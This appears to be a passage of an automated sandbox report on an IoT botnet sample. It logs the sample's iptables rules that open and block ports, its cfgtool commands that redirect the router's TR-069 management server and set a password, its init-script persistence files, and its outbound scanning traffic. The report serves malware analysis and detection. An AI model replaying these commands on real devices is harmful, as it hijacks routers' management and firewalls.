                            Source: /tmp/bin.sh.elf (PID: 6297)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 57285 -j ACCEPT"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6300)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 57285 -j ACCEPT"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6326)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6329)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6332)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6335)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6338)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6340)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6342)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6345)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6348)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6351)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6354)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6357)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6360)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6367)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6372)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6378)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6382)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6388)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6399)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 60815 -j ACCEPT"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6402)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 60815 -j ACCEPT"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6405)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 60815 -j ACCEPT"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6408)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 60815 -j ACCEPT"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6415)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 60815 -j ACCEPT"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6421)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 60815 -j ACCEPT"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6427)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 60815 -j ACCEPT"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6433)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 60815 -j ACCEPT"Jump to behavior
                            Source: /bin/sh (PID: 6275)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6282)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6285)Iptables executable: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6290)Iptables executable: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6293)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6296)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6299)Iptables executable: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6302)Iptables executable: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6328)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6331)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6334)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6337)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6344)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6347)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6350)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6353)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6356)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6359)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6366)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6369)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6377)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6380)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6387)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6393)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6401)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p udp --destination-port 60815 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6404)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p udp --source-port 60815 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6407)Iptables executable: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 60815 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6414)Iptables executable: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 60815 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6420)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p udp --dport 60815 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6426)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p udp --sport 60815 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6432)Iptables executable: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 60815 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6438)Iptables executable: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 60815 -j ACCEPTJump to behavior
                            Source: /usr/bin/dash (PID: 6219)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.xtr71Z5d7V /tmp/tmp.6BCIrgckW3 /tmp/tmp.FznSbp6tJ4Jump to behavior
                            Source: /usr/bin/dash (PID: 6228)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.xtr71Z5d7V /tmp/tmp.6BCIrgckW3 /tmp/tmp.FznSbp6tJ4Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6261)Reads from proc file: /proc/statJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6244)File: /usr/networks (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6244)File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6244)File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6244)File written: /usr/networksJump to dropped file
                            Source: /tmp/bin.sh.elf (PID: 6244)Shell script file created: /etc/rcS.d/S95baby.shJump to dropped file
                            Source: /tmp/bin.sh.elf (PID: 6244)Shell script file created: /etc/init.d/S95baby.shJump to dropped file
                            Source: submitted sampleStderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705: exit code = 0

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Source: /tmp/bin.sh.elf (PID: 6244)File: /etc/init.d/S95baby.shJump to dropped file
                            Source: /tmp/bin.sh.elf (PID: 6244)File: /etc/init.d/keyboard-setup.shJump to dropped file
                            Source: /tmp/bin.sh.elf (PID: 6244)File: /etc/init.d/console-setup.shJump to dropped file
                            Source: /tmp/bin.sh.elf (PID: 6244)File: /etc/init.d/hwclock.shJump to dropped file
                            Source: /tmp/bin.sh.elf (PID: 6244)File: /usr/bin/gettext.shJump to dropped file
                            Source: /tmp/bin.sh.elf (PID: 6244)File: /usr/bin/rescan-scsi-bus.shJump to dropped file
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55170 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33862 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57246 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34956 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42656 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53386 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37290 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53460 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53152 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46644 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56416 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 32770 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56786 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49462 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42460 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34158 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55426 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34592 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48832 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41512 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48810 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60062 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54916 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52194 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40736 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54474 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39080 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56834 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49334 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51128 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47196 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51090 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60498 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50342 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47266 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34698 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54360 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60268 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40872 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44094 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58788 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37558 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50614 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50966 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34526 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44616 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36296 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56402 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49388 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46276 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38626 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34686 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43986 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35766 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59794 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38618 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54792 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55294 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60714 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36632 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52560 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44238 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53554 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40020 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39706 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44322 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56664 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37722 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52506 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35628 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48112 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60778 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42750 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36116 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48768 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53434 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36702 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42466 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48570 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40158 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43418 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34658 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48726 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39538 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55572 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33374 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59782 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50698 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34298 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36608 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47068 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44886 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39688 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40018 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51364 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35312 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52432 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43402 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34066 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56088 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59688 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37608 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50660 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48846 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60010 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55030 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49060 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59674 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44448 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52900 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43532 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60140 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45422 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48626 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45656 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45596 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43880 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43958 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39428 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48312 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41518 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40154 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40196 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45114 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59424 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41272 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42548 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60776 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37724 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34628 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39656 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38284 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54284 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44394 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44166 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50630 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42854 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53612 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57450 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44056 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60002 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53354 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48974 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41324 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52684 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35616 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45496 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53778 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51038 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54604 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60844 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42354 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40806 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35144 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40192 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54634 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35108 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46152 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52986 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52390 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60010 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48438 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41060 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50664 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56158 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34918 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 32944 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55158 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58314 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60376 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45890 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39998 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34878 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42772 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35580 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51652 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60476 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39566 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46480 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52416 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39552 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51036 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47010 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38028 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51176 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35580 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45924 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36814 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43140 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41862 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51534 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59094 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 32962 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57848 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48938 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41766 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35750 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38332 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55162 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44994 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41838 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41154 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41548 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49106 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33322 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54972 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46566 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51756 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53140 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44560 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54308 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35620 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40358 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37510 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43296 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33188 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49390 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39368 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45414 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34304 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60006 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49412 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36202 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53644 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39746 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60674 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43582 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55736 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45748 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58586 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43462 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33110 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47508 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50770 -> 52869
